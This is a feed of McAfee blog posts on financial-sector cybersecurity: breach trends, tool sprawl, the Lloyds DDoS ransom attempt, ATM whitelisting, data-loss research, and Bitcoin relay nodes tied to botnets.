Cyberattacks and Financial Services: Good News, Bad News https://securingtomorrow.mcafee.com/business/cyberattacks-financial-services-good-news-bad-news/ https://securingtomorrow.mcafee.com/business/cyberattacks-financial-services-good-news-bad-news/#respond Thu, 29 Jun 2017 23:00:17 +0000 https://securingtomorrow.mcafee.com/?p=75624 As highlighted in the Verizon 2017 Data Breach Investigations Report, the financial services sector continues to be a target of cyberattacks. That said, the trend has also shifted to other verticals, such as healthcare with the recent WannaCry attack and other hospital data breaches. One hopes, as the report suggests, that banks’ significant investments have […]

The post Cyberattacks and Financial Services: Good News, Bad News appeared first on McAfee Blogs.

]]>
As highlighted in the Verizon 2017 Data Breach Investigations Report, the financial services sector continues to be a target of cyberattacks. That said, the trend has also shifted to other verticals, such as healthcare with the recent WannaCry attack and other hospital data breaches. One hopes, as the report suggests, that banks’ significant investments have paid off, and that the reduction in overall incidents is a demonstration of their improved security posture. Of the reported attacks, most were associated with DDOS, and the rest were primarily skimming efforts used in stealing card data.

Account take overs continue to be a pestilence for the banking industry although improvements in fraud detection and authentication have reduced the success of these types of attacks. Meanwhile, insider privilege misuse continues to rise and banks will clearly need to make more investment in their systems and behavioral analytics to protect themselves.

These types of security improvements may have reduced the number of financial services breaches. On the other hand, we must also examine an alternate theory: That the sheer availability of financial data has reduced its value and, therefore, prompted criminals to seek more fruitful avenues—for example, health care data and its rich bounty of Social Security numbers or and other personal identifiers. Analysts of the U.K. health system’s WannaCry breach estimate that medical information could be worth ten times more than credit card numbers on the Dark Web.

Even in these cases, however, cybercriminals often seek to monetize attacks. Their activity will often still touch financial institutions, who will continue to bear the brunt of monetary losses associated with cybercrime regardless of the originally targeted industry.

Further, we can expect to see a rise in mobile and cloud-based attacks as these technologies gain consumer adoption. To blunt these threats, communication across the financial industry and across vertical industry lines will be one of the best defenses as the business of cybercrime continues to keep pace with the technical evolution.

The post Cyberattacks and Financial Services: Good News, Bad News appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cyberattacks-financial-services-good-news-bad-news/feed/ 0
Show me the money – Financial Services Need to Rethink Security https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/ https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/#respond Thu, 22 Jun 2017 04:05:58 +0000 https://securingtomorrow.mcafee.com/?p=75206 Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” […]

The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

]]>
Financial institutions are under attack. As gatekeepers to consumers’ and enterprises’ most personal and private information, this industry serves as one of the most lucrative avenues for cybercriminals to pursue. In response, financial services organizations have developed unsustainable security infrastructures that are characterized by a huge proliferation of tools to address “the next big thing” in cyber threats.

As highly publicized breaches continue against financial institutions, organizations are stuck in a frustratingly reactive cycle: with every emerging attack a  new tool or widget is  added to an already  complex arsenal of security solutions. This stockpile of tools often lack automation and Big Data analytics capabilities, preventing IT teams from being able to catalog and respond to threats in a timely manner. Over time, organizations are left struggling to patch holes and close siloed security gaps, always looking to identify the next vulnerability while making it difficult to get ahead.

The industry must move beyond this segregated approach to better protect themselves and their customers. According to Closing the Cybersecurity Gaps in Financial Services, a global survey from Ovum and sponsored by McAfee, an overwhelming number of financial institutions, especially Tier 1 and 2, deploy between 100-200 disparate security solutions.  The report also finds that three percent of global financial services institutions use over 100 security solutions, reducing effectiveness and creating additional operational cost increasing their organization’s cyber risk exposure. Adding to security teams’ burdens: 37 percent of respondents deal with over 200,000 daily security alerts. Security teams are overwhelmed with sifting through and prioritizing the vast amounts of alerts that each security tool is generating often with limited threat intelligence sharing between the various tools in a cohesive and adaptive manner. The sheer amount of manpower required to accurately sift through each alert drains resources and leaves security teams drowning in IT complexity. Not surprisingly, over a third of respondents across EMEA, US and APAC listed integrating and maintaining disparate security tools as their top operational pain point.

Financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe. Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time. These worries are corroborated by the Ovum study, where 40 percent of respondents indicated that faster threat discovery is their first or second security priority. To enable quicker threat detection, over 70 percent of organizations are planning strategic investments in cloud, web and ATM security.

Ovum highlights some promising trends that point towards a better, more secure future for these organizations. Financial institutions have undergone a significant shift in the decision-making process for cybersecurity initiatives, with teams outside IT such as fraud, compliance, risk management and operations all now taking part. Forty-eight percent of respondents from the fraud team reported they were a decision maker in their company’s cybersecurity initiatives, followed by compliance and risk management – both reporting over 37 percent. This shift highlights the high priority level that financial institutions have put on cybersecurity, which is well-warranted considering that breaches will have severe consequences that reach as far as to fraud, insider/outsider collusion, regulatory compliance and legal. In this regard, these organizations are regarded as the gold standards that all other industries should aspire to.

The financial services industry is in the beginning stages of another industry-wide shift, as over 60 percent of respondents agree that the industry needs better, not more, security tools, which will ultimately enable greater automation, integration and orchestration of tasks, as well as end-to-end visibility across the security infrastructure. The next big financial breach continues to be one of the biggest concerns in the financial services industry, constantly serving as a reminder to organizations for the need of a unified and fully implemented security strategy. Greater automation, integration and orchestration are necessary first steps to provide relief to these teams, which can only be delivered through a unified threat defense architecture. The transformation to an open source communications fabric offers a significant impact on the efficiency and effectiveness for organizations by simplifying the integration of disparate tools and enabling the sharing of threat data.

Join McAfee and a host of financial experts for Transforming Cybersecurity in Financial Services, a free webinar on Thursday, June 22, 2017, at 10 a.m. EST to learn more on current gaps and challenges in financial IT security, emerging threat vectors and attacks, use of machine learning and advanced analytics, best practices that can benefit financial institutions and the path forward.

 

The post Show me the money – Financial Services Need to Rethink Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/show-money-financial-services-need-rethink-security/feed/ 0
Widening Threat Surface and Security Gaps https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/ https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/#respond Tue, 28 Mar 2017 19:12:40 +0000 https://securingtomorrow.mcafee.com/?p=70813 This blog was written by Maneeza Malik. Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions […]

The post Widening Threat Surface and Security Gaps appeared first on McAfee Blogs.

]]>
This blog was written by Maneeza Malik.

Digital transformation, the rise of mobile banking, ongoing migration of core banking services to the cloud and a shift towards an omni-banking model have all contributed to an overall wider threat landscape for financial institutions to monitor and manage. This is further exacerbated by the fact that financial institutions operate in a highly complex and interconnected financial ecosystem connecting thousands of entities, networks and users across the globe.

Petabytes of data, billions of messages and transactions flow across this interconnected system on a daily basis and make it a daunting task to monitor, detect and block anomalous activities, elusive threats and under-the-radar attacks in real-time.  , Cybercriminals have the potential to launch a large scale attack by infiltrating and exploiting one ‘weak link’ in this interconnected system, targeting multiple financial institutions in various geographies simultaneously.  This has vastly elevated the potential for risk of “systemic” consequences for the industry at large.

On top of that, financial institutions have the added burden of operating in an environment where system, process and security silos prevail.  With hundreds of disparate security tools deployed, they are constantly struggling to patch holes and close gaps in their threat defense lifecycle. Security teams are often overwhelmed with sifting through and prioritizing the vast amounts of alerts that each security tool is generating often with limited threat intelligence sharing  between the various tools in a cohesive and adaptive manner.

In a recent study issued by Morgan Stanley (1), it was reported that better security tools with tighter integration and automation are  needed. It suffices to say – as the financial services industry and world at large rapidly march towards further digital transformation, the challenge to bridge the security gaps will get increasingly difficult in an industry whose very “foundation” is built on an interconnected system — linking financial institutions, payment and settlement processors and various other entities including the 3rd party providers that financial institutions work with globally.

So now, the pressure is on everyone (and not just the top G20 financial institutions) to prevent cyberattacks at the scale we saw in in 2016 with the Bangladesh Bank, SWIFT, and the Federal Reserve Bank of NY. Or the Carbanak attack on multiple financial institutions resulting in nearly $1 billion in losses the year prior.

The path forward will require implementing multiple steps:

  • Implement ‘a unified threat defense security infrastructure’  —  one where financial institutions pivot from disparate security solutions that have created yet ‘another layer of silos’…in an already complex and fragmented technology landscape.  This means security solutions need to work in an integrated, automated and adaptive manner.
  • Adopt a communication fabric that is built on open standards, enabling your business to easily integrate the your disparate security solutions to create a cohesive and adaptive threat defense lifecycle. To do that, consider  a solution, such as McAfee Open DXL, that can help your institution share information easily across your security infrastructure.
  • Adopt greater collaboration practices across the industry (bringing in both the security vendor community as well as more banks, not just the top 100 or G20 banks).  This is a burden that needs to be carried by all and not just a few
  • The creation of hunter teams need to become more pervasive in the industry and a best practice (switching from reactive to proactive mode) for more about this read our paper on the big attacks from 2016 .
  • While the industry does not need or would welcome yet another regulation — this is one area where a global cybersecurity regulation is required.  This is not to penalize a handful of banks, but rather protect an interconnected ecosystem where hundreds and thousands of entities are connected to the financial system. The need for everyone to pursue the same set of guidelines and regulatory stipulations is needed.

The post Widening Threat Surface and Security Gaps appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/widening-threat-surface-security-gaps/feed/ 0
Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/ https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/#comments Mon, 30 Jan 2017 18:51:59 +0000 https://securingtomorrow.mcafee.com/?p=68609 This blog was written by Maneeza Malik. In the matter of 48 hours, over 20 million customers couldn’t check their  bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? […]

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

]]>
This blog was written by Maneeza Malik.

In the matter of 48 hours, over 20 million customers couldn’t check their  bank accounts online. And it’s all because of two people. Two cybercriminals, to be exact, who worked in tandem to conduct a DDoS (distributed denial of service) attack against Lloyds Banking Group. The end goal? Demand a ransom from the banking group, which they knew would be desperate to restore access back to its irritated customers.

 So how exactly did this DDoS attack work? To start, the cybercriminals bombarded the widely-used British bank’s online platform with millions of fake requests designed to grind the group’s systems to a halt. That halt managed to last almost three days, denying access to millions upon millions of customers across the U.K.

Then, the pair sent an email to a Lloyds Bank executive, pretending to be a consultant offering to restore the bank’s system and get it back online for a small fare of 100 Bitcoin (£75,000 / $94,000). Luckily, the disguised ransom extortion failed, as the cybercriminals’ bitcoin address still has zero balance with zero transactions made. As an added bonus, it seems no accounts were hacked or compromised during the attack, and service has returned back to normal.

Lloyds IT security experts are to thank for that, who “geo-blocked” the source of the attack, which is a security technique that effectively drops a portcullis over the server launching the attacks but also stopped legitimate customer requests from that area, too.

Though no customer data has been stolen and service is back online, this cyberattack is an unfriendly reminder about the nature of DDoS attacks, their ability, and their true impact.

Joe Bernik, McAfee CTO for Financial Services, noted that the attack is nothing new, but attacks like it aren’t going anywhere. “As one of the oldest forms of internet-borne attacks, DDoS attacks are effective and popular because the internet architecture and protocols it uses easily lend themselves to this form of attack. Therefore, it makes sense that the attack on Lloyds’ banking platform is similar to the DDoS attacks that impacted large U.S. banks in 2013 and 2014 as well.”

Bernik continued, “Adding to this ease, DDoS attacks are highly visible by nature, and easy to perform, given the availability of ‘for hire’ botnets.  It’s also important to remember that—especially in cases like Lloyds Bank—a DDoS attempt can be part of a larger attack and could just be a detractor used to redirect security resources.”

Indeed, such attacks are something all banks need to be aware of in order to be on high alert. They need to look for threats and evasive attacks across their entire network and across all omni-banking touch points.

There is nothing unique here.  Yes DDOs attacks are here to stay.  As are cyber threats/attacks of all sorts. The bigger question is….banks need to shift their security posture to take a more offensive stance and not only be at the other end of the fire hose.  Granted that’s easier said than done.  They also need greater visibility “holistic view” into their security posture versus multiple myopic lenses that may hamper the ability to proactively detect and block attacks.  What did we learn about this attack on Lloyds bank….that customers started to report that they could not access their accounts which then triggered an alert.  Detecting and blocking attacks on the onset will continue to be both a challenge and a desired goal for banks. Whether it’s a DDos attack, zero-day attack or some other form of evolving and emerging threat.

The post Target of Massive DDoS Attack and Ransom Demand, Lloyds Banking Group Manages to Fend off Cybercriminals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/target-massive-ddos-attack-ransom-demand-lloyds-banking-group-manages-fend-off-cybercriminals/feed/ 4
Five Ways to Improve ATM Security Using McAfee Integrity Control https://securingtomorrow.mcafee.com/business/five-ways-improve-atm-security-using-mcafee-integrity-control/ Tue, 18 Oct 2016 15:00:12 +0000 https://blogs.mcafee.com/?p=53177 This blog post was written by Teresa Wingfield. Given retail banking customer’s non-ending appetite for greater ATM self-service functionality at ever-increasing locations, it’s not surprising that banks are having trouble delivering rigorous security. According to a recent Forrester Consulting study commissioned by Diebold [1], financial institutions lack confidence in their current ATM security. Even though 21 to […]

The post Five Ways to Improve ATM Security Using McAfee Integrity Control appeared first on McAfee Blogs.

]]>
atm

This blog post was written by Teresa Wingfield.

Given retail banking customer’s non-ending appetite for greater ATM self-service functionality at ever-increasing locations, it’s not surprising that banks are having trouble delivering rigorous security. According to a recent Forrester Consulting study commissioned by Diebold [1], financial institutions lack confidence in their current ATM security. Even though 21 to 30% of all their in-house security efforts are devoted to ATMs, technology and resource issues create challenges for keeping up with frequently changing ATM security needs and compliance requirements. Forrester goes on to say that financial institutions consider partners for support, but are concerned about handing over control.

What is McAfee Integrity Control?

McAfee Integrity Control provides security for fixed-function devices such as ATMs to help address many of the concerns raised by Forrester. It combines whitelisting and change control to block unauthorized applications and change.

Whitelisting is a simple, yet effective solution. A whitelist is a list of trusted applications that are allowed to execute. So, when an unknown threat tries to run, it can’t because it’s not in the whitelist.

Change control consists of file integrity monitoring and change prevention, important ways to identify and stop security risks. Integrity monitoring provides real-time visibility of change events and sends alerts when there are critical and unauthorized changes. Change prevention provides the ability to enforce making only authorized changes and performing them within the pre-set boundaries as defined by corporate policy.

Why McAfee Integrity Control for ATMs?

Let’s take a look at some specific examples of how McAfee Integrity Control can help retail banks tackle some of their toughest ATM security challenges.

  1. Simplifying Security Implementation — Thieves can use malware to drain an ATM’s cash or steal account numbers and PINs. However, malware protection for a network of ATMs can be difficult to implement since it uses virus signatures. You have to ensure .DAT files containing signatures are distributed and kept up-to-date. McAfee Integrity Control, on the other hand, locks down ATMs without requiring signatures. This is a more efficient approach that prevents unauthorized software such as malware to run.
  2. Keeping ATMs Up-to-Date — Banks need to safely make volumes of ATM software updates without the need to visit each ATM for every update. McAfee Integrity Control makes it possible to implement and automate a change management process for ATMs without human intervention using trusted updaters that are approved sources of change.
  3. Solving the Remote ATM Service Challenge — McAfee Integrity Control allows for certified and authorized updates to be easily created and distributed to personnel servicing ATMs and limiting scope to only the changes authorized time maintenance window. Even if the technician has “Admin” login privileges, McAfee Integrity Control will not allow additional alterations to the ATM.
  4. Improving ATM Security Compliance —Change Audit, a key feature of McAfee Integrity Control, supports accountability and audits by identifying the time and source of changes, files that were changed, and the user logged in to the system when changes were made. Having this level of control for ATMs delivers end-to-end continuous compliance by both knowing and stopping unauthorized and unwanted changes.
  5. Meeting the Needs of Fixed-Function Devices — An ATM is a fixed-function device, meaning it has a fixed CPU and memory.   McAfee Integrity Control delivers minimal impact on the performance of fixed-function devices with its low memory and CPU usage and with no file scanning requirements.

Summary

Click here to learn more about how McAfee Integrity Control can help you deliver stronger security and compliance for your ATMs using less resources.

[1] Forrester Research on ATM Security:  How Prepared Are You?, March 16, 2016  http://blog.dieboldnixdorf.com/forrester-research-on-atm-security-pt1/#.V_Kd8u_rtaQ

 

 

The post Five Ways to Improve ATM Security Using McAfee Integrity Control appeared first on McAfee Blogs.

]]>
‘McAfee Labs Threats Report’ Delves Into Dangers of Data Loss https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-delves-into-dangers-of-data-loss/ Mon, 26 Sep 2016 11:01:27 +0000 https://blogs.mcafee.com/?p=52565 This blog post was written by Rick Simon. Data is leaking out of your organization: accidentally or intentionally, by internals or externals, physically or electronically. During the past year, we have performed extensive research to identify what data is being targeted, who is taking it, how they are getting it out, and the best practices […]

The post ‘McAfee Labs Threats Report’ Delves Into Dangers of Data Loss appeared first on McAfee Blogs.

]]>
This blog post was written by Rick Simon.

Data is leaking out of your organization: accidentally or intentionally, by internals or externals, physically or electronically. During the past year, we have performed extensive research to identify what data is being targeted, who is taking it, how they are getting it out, and the best practices to reduce your exposure to data loss.

We found that most organizations do not realize that they are leaking data. Between 50% and 80% of data breaches are discovered by outside entities, typically when the data is used or sold. According to the 2016 Verizon Data Breach Investigation Report, internal discovery of breaches has been on a downward trend for 10 years.

It should be no surprise that data thefts are usually about the money or that between 60% and 80% of them are conducted by external agents. However, that still means that 20% to 40% of data loss is the result of intentional or accidental actions by people on the inside. Physical media, such as USB keys and laptops, are the most common method of data loss from internals, but fewer than 40% of organizations surveyed are watching these devices closely enough to catch them.

Organizations with data loss prevention (DLP) systems should be well positioned to block data leakage, but many do not appear to be using the tools to their best advantage. Data loss is increasingly happening with unstructured data, such as office documents, yet many organizations do not monitor unstructured data. Relying solely on regular expressions, which is a common method to find things such as credit card or social security numbers, leaves too much valuable information unmonitored.

On average, the IT professionals we surveyed reported dealing with about 20 incidents per day, but there was a tremendous range. Small companies and those in the Asia-Pacific region tend to run below average, while large companies, especially those in financial services and retail, tend to run higher than average. Because false negatives, or data loss that does not trigger an incident alert, are one of the challenges with DLP systems, we found that configuring systems to watch more actions is an important part of reducing the likelihood of data loss.

On the positive side, we found that 85% of all organizations surveyed delivered regular security awareness training to keep the importance of data protection fresh in people’s minds. Teaching employees how to recognize the value of the data they are processing makes the issue real for their particular jobs. Automatic pop-ups that notify them when they are doing something potentially risky are a great reminder, and do not consume a lot of resources.

For more information on this research, download the McAfee Labs Threats Report: September 2016.

The post ‘McAfee Labs Threats Report’ Delves Into Dangers of Data Loss appeared first on McAfee Blogs.

]]>
Who Let the Data Out? Who, Who, Who, Who? (Part 1 of 3) https://securingtomorrow.mcafee.com/business/data-security/let-data-part-1-3/ Mon, 19 Sep 2016 15:00:08 +0000 https://blogs.mcafee.com/?p=52674 Nowadays, everyone knows how important data is. Who hasn’t seen a sensational news story about a data breach lately? Despite all this public exposure, however, not everyone is qualified to protect organizations against breaches. It takes more than binge-watching a season of Mr. Robot to become a cybersecurity expert, or many of us would be […]

The post Who Let the Data Out? Who, Who, Who, Who? (Part 1 of 3) appeared first on McAfee Blogs.

]]>
Nowadays, everyone knows how important data is. Who hasn’t seen a sensational news story about a data breach lately? Despite all this public exposure, however, not everyone is qualified to protect organizations against breaches. It takes more than binge-watching a season of Mr. Robot to become a cybersecurity expert, or many of us would be out of a job! In this industry, the right knowledge defends organizations against attack. And to gain it, the six “w” questions are as important as ever: who, what, when, where, why, and how?

To find the answers, Ponemon Institute conducted a seven-nation survey of 1,000 IT decision-makers in financial services, healthcare, government, manufacturing, and retail organizations, to develop benchmarks for data loss prevention incidents, visibility, and maturity. The primary goal of this research was to understand and compare the number of data protection incidents that organizations deal with on a daily basis and the factors that influence this. Aggregating the results from this report, with previous information from the Verizon DBIR and Grand Theft Data: 2015 McAfee Data Exfiltration Study gives us a bird’s eye view on all things DLP.

Rolling in The Deep Takeaways

What were the conclusions? For starters, we’ve confirmed the Wu-Tang saying “cash rules everything around me” to still be true: financial motives are behind 89% of data breaches. This has been an upwards trend since 2013. So organizations with easily-monetized data, such as credit card and payment information, are at higher risk of attack. At the same time, we’re also seeing perpetrators seize more opportunities to profit from other data, such as health records.

In the face of widespread looting, compliance issues are relevant. So far, most companies have focused only on the requirements within their own political and geographical domains. More cooperation could build frameworks for broader monitoring. That would certainly be a good thing, but let’s not get the wrong idea. The report reveals that compliance alone doesn’t correlate to more effective data-loss prevention.

Just Beat It, Or Be Defeated

For cybersecurity teams to successfully secure data, one crucial area needs improvement. Internal teams’ monitoring capabilities are not up to par, and it’s hurting them. Stolen data is often sold or used before companies even notice. In fact, it’s more the norm that third parties like law enforcement discover breaches first.

Who are these eager villains, who look at organizations’ defenses thinking “just beat it?” Most of the time, external perpetrators are behind the deed. Think of nation-states, organized crime rings, and profit-hungry hackers. They’re responsible in 60-80% of cases. As for the other 20-40%, those involve people with access to confidential data. Think of contractors, partners, or employees. While protecting against external threats is clearly the priority, internal security can’t be overlooked either. Regardless of who’s responsible, no one wants to be defeated.

Who Are You? Who, Who?

What do we know about the companies being attacked? Well, if you think cybercriminals prefer to phish for a bigger catch, your hunch is right. Once we examine the median number of incidents for companies of different sizes, the trend is clear. The largest companies see the most incidents (31-50 daily), mid-sized companies experience less (21-30 daily), and smaller companies have the least (11-20 daily).

The size of a company also connects with its geographical identity. Asia-Pacific companies are smaller than the global norm on average. As you’d expect, their median corresponds to 11-20 incidents daily. On the other end of the range, Indian companies, larger than the global average, have a median of 31-50 incidents daily.

Of course, a company’s business also influences its risk. Cybercriminals are more interested in some industries than others. It’s no surprise that financial services are the hardest hit, followed by retail. Since profit is the largest motivator for attacks, we can attribute this to the temptation of payment and financial data for crooks.

However, there’s also good news. The most-threatened industries learn to prepare for threats. When companies were asked to assess how adequate their defenses were, retailers felt the most comfortable, followed by financial and healthcare organizations. Manufacturing companies ranked at the bottom of that list.

Where The Breaches Have No Name

At the end of the day, data breaches aren’t going away anytime soon. Tellingly, the rate of acceleration for speed of compromise is outpacing the rate of acceleration for discovery. While perpetrators only take minutes or hours to crack in, security teams often need days to find out about incidents.

There’s more work to be done. But with the right knowledge, cybersecurity experts can change the tide. Intelligence is the basis for success in our industry. It all starts with knowing the who, what, when, where, why, and how of data breaches. Maybe then, news outlets will find other sensational topics, when the breaches have no names.

Finally, visit us at the upcoming FOCUS security conference at ARIA Resort and Casino in Las Vegas, Nevada. Data protection expert Rob Gresham and Larry Ponemon of the Ponemon Institution will take a deep dive into this research. Catch their talk 11:15am on November 2nd, at Room 7-Pinyon 3.

Stay tuned for the next blog! We’ll discuss types of leaked data, how breaches occur, and employee training tips. Get updates by following @McAfee and @McAfee_Business.

Curious about something? Chat with us on the hashtag #WhoLetTheDataOut. Come on, it’s irresistibly fun to yell “who, who, who” while typing.

See you for the next blog!

The post Who Let the Data Out? Who, Who, Who, Who? (Part 1 of 3) appeared first on McAfee Blogs.

]]>
Blockchain Transactions Create Risks for Financial Services https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/#respond Thu, 17 Dec 2015 00:36:35 +0000 https://blogs.mcafee.com/?p=46674 This post was written by Raj Samani and Christiaan Beek of McAfee , and Shane D. Shook, PhD. Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a […]

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

]]>
This post was written by Raj Samani and Christiaan Beek of McAfee , and Shane D. Shook, PhD.

Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a suspect service. Within the financial services industry, the notion of trust is of paramount importance to institutions and account holders alike. Investors must be confident that the money they have in their accounts is available for use whenever they need it, and that the routes and terminals involved in buying Christmas presents, for example, are protected with many layers of security.

But what happens with this concept of trust if, for example, one in every 25 withdrawals made from an ATM is authorized by a bank operated by a known criminal organization? Or if one of every six credit card purchases was transacted by a terminal suspected to be controlled by known criminal organizations? It is likely the implied level of trust customers have in the financial system would be shaken; moreover, they would certainly seek a more trustworthy provider for financial transactions.

Looking at trust among cryptocurrencies, McAfee has undertaken an analysis of Bitcoin to determine the likely risk to transactions made with this increasingly popular method of payment. In particular, we focused on the risks to the security of the network that serves the “blockchain,” the public database of all Bitcoin transactions. Although our research did not identify any specific risks associated with the security of the funds exchanged, we did identify risks that may affect the reliability of the blockchain itself. Our focus was predominantly on Bitcoin relay nodes, and the integrity of those nodes.

Whenever these transaction relay nodes do not offer a sufficient level of integrity (for example, being a part of botnet operations), they could be used to manipulate Bitcoin transactions through route control, denial of service, or by modifying transaction protocols. Moreover, a botnet-controlled relay node can be monitored to reveal the identity of one party in a transaction. If enough relay nodes are connected by a botnet operator, it may even be possible to deanonymize the other parties. Further, as the blockchain and related products have evolved, vulnerabilities in software clients have cropped up. Attempts to exploit the Bitcoin peer-to-peer network are known in research as well as in the wild; thus the knowledge of botnet- or malware-associated peers is a concern.

Background
The blockchain is a public ledger that facilitates payment through cryptocurrencies (such as Bitcoin) for goods or services of more than 10,000 vendors and many thousands of individuals, including legitimate (food, airfare, books, cars) and illegitimate (malware, extortion/ransom, drugs). The blockchain is also being explored for commercial purposes with new offerings created for “secure exchange” services such as currencies, contracts, and equities trading or clearing.

The blockchain includes literal details concerning every transaction between addresses that have successfully negotiated a transfer, such as Bitcoin payments from one wallet to another, including time, sender and receiver wallet addresses, amounts, and relay IP addresses (both v4 and v6) of “bitnodes” that facilitate the transactions’ communications.

At any time there are around 9,000 active bitnodes, some that operate as “full nodes” (peers) and others that serve as relays or a type of proxy, also known as a “lightweight node.”

20151216 Blockchain1

Source: https://bitnodes.21.co/

Related Risks
Approximately 2% of the bitnodes were coincidentally included for use by malware samples, and another 1% of bitnodes were included on Internet blacklists related to botnet control servers or other compromised hosts, according to data collected from Blockchain.info and Bitnodes.io (which peer with approximately 70% of active nodes) as well as open-source intelligence (OSINT) about botnets and malicious network addresses of nearly 145,000 unique IP addresses that relayed blockchain transactions for Bitcoin between February–December 2015. Those figures are historical summaries that when viewed in real time reflect more significant risks to the security of blockchain transactions.

For the same period, a real-time review of active bitnodes (available peers) demonstrated that at any given time 4% of bitnodes addresses were included for use by malware samples (available for review on Virustotal.com), and an additional 13% of bitnodes appeared on public Internet blacklists. Thus in effect one in six Bitcoin transactions were relayed by nodes under the control of malicious operators. The difference between the historical and real-time statistics is simple: Bitnodes that correspond with malware or botnets act as blockchain relays more often than others.

For example, let’s look at the following details of a bitnode active on December 2:

20151216 Blockchain2

The malware sample that used the preceding bitnode (IP address) was a Fujacks Trojan, a well-documented botnet backdoor that allows a botmaster to remotely control the infected computer, collect information, and install other malware or tools that suit the botmaster’s (or subscribers’) interests.

20151216 Blockchain3

This bitnode has been active since November 24:

20151216 Blockchain4

The associated malware is the Sefnit Trojan, a botnet backdoor that not only allows the botmaster to remotely control the host, but upon installation also injects a TOR client to mask botnet communications. Compromised computers could suffer the installation of any malicious tools. For example, past infections of Sefnit include ad-click fraud. There is also documented coincidental history of the use of Sefnit by malicious botmasters to mine bitcoins using infected computers. As with many botnets, take down efforts are sometimes temporary, and the subsequent utility of the botnet changes and on occasion expands.

20151216 Blockchain5

Our analysis of the varied malware samples that relate to bitnode addresses which have relayed blockchain transactions during the past 18 months demonstrates that most of the botnets are related to Zeus. Zeus source code has been readily available (in several publicly released iterations and sold in specific versions) since at least 2011. It is a popular “starter kit” for botnet creation, and anyone with relatively modest technical capabilities can build and operate a botnet. More important though, botnets offer subscriber services that can facilitate more exotic crimes than simply compromising access to a computer.

The preceding Sefnit malware sample used that bitnode (IP) address as a TOR relay address, so that not only Bitcoin transactions would relay through that bitnode, but other TOR users could also use that host. Unfortunately not only legitimate TOR users, however: Computers infected with that Sefnit malware would be inducted into a botnet that used that TOR relay (coincidentally the bitnode address).

OSINT and McAfee threat intelligence, respectively, confirmed that 3% of the unique bitnode addresses observed between February and December 2015 were included in malware samples for botnet communications, as control or routing. Of those addresses, the following 30 bitnodes accounted for 25% of associated malware submissions.

20151216 Blockchain6

Our analysis of submitted malware samples that used those bitnode addresses indicated that 83% of related samples were from the following malware families:

 

Malware in Top 30 Bitnode Addresses (Feb–Dec 2015) With Number of Submissions
Allaple 4,611 Carberp 52 Dacic 11
Kelihos 860 Renos 42 Senta 8
Bladabindi 378 Dugenpal 41 Sisron 6
Pykspa 106 Bagsu 35 Vitro 5
Bulta 71 Glupteba 32 Teerac 5
Fynloski 71 Swrort 28 Peaac 4
Zbot 65 Waledac 25 Bumat 3
Dynamer 61 Skeeyah 25 Reveton 1
Sality 57 Omaneat 24 Simda 1
Virut 53 Runpoor 18

Where are they?
This begs the question: Which came first? Was the bitnode (host) set up by a botmaster for nefarious purposes, or was a host compromised and misused for botnet control purposes? As far as blockchain uses go, does it matter? The result is that the particular host is under the botnet control.

Many people mistakenly assume that blockchain transactions are always protected by the use of TOR; however, our analysis of the IP addresses regarding TOR nodes indicates that less than 0.25% of known bitnodes are also TOR nodes. TOR is commonly recommended for use with blockchain software clients, so the coincidence of bitnodes that also serve as TOR nodes is an additional risk to be considered by vendors or subscribers to blockchain technology.

The following map shows the geographic outlay of TOR nodes on December 2.

20151216 Blockchain7

Source: http://cdetr.io/tor-node-map/

Bitnodes are deployed globally according to concentrations of users who support the technology. Consequently, the nodes that coincidentally are used for other purposes (such as TOR or malware control) are equally global in their geolocations. There is general overlap in geographic regions between TOR and bitnodes, although the overlap in addresses is very limited.

20151216 Blockchain8

Source: https://bitnodes.21.co/

Applying OSINT to the blockchain
By using OSINT and proprietary information we can create dispositions of bitnodes by their risk categories. The following map indicates the regional concentrations (on December 2) by bitnodes as (red) Suspicious, (blue) Interesting, and (yellow) Normal. “Suspicious” indicates a bitnode that appears on blacklists and has high detection rates in samples that use the bitnode address. “Interesting” is a bitnode address that is a known TOR exit node or appears in any malware samples. “Normal” encompasses all others.

20151216 Blockchain9

Only a relatively small percentage (17%) comprise Suspicious or Interesting nodes. The following chart indicates the breakout of Suspicious nodes by country code.

20151216 Blockchain10

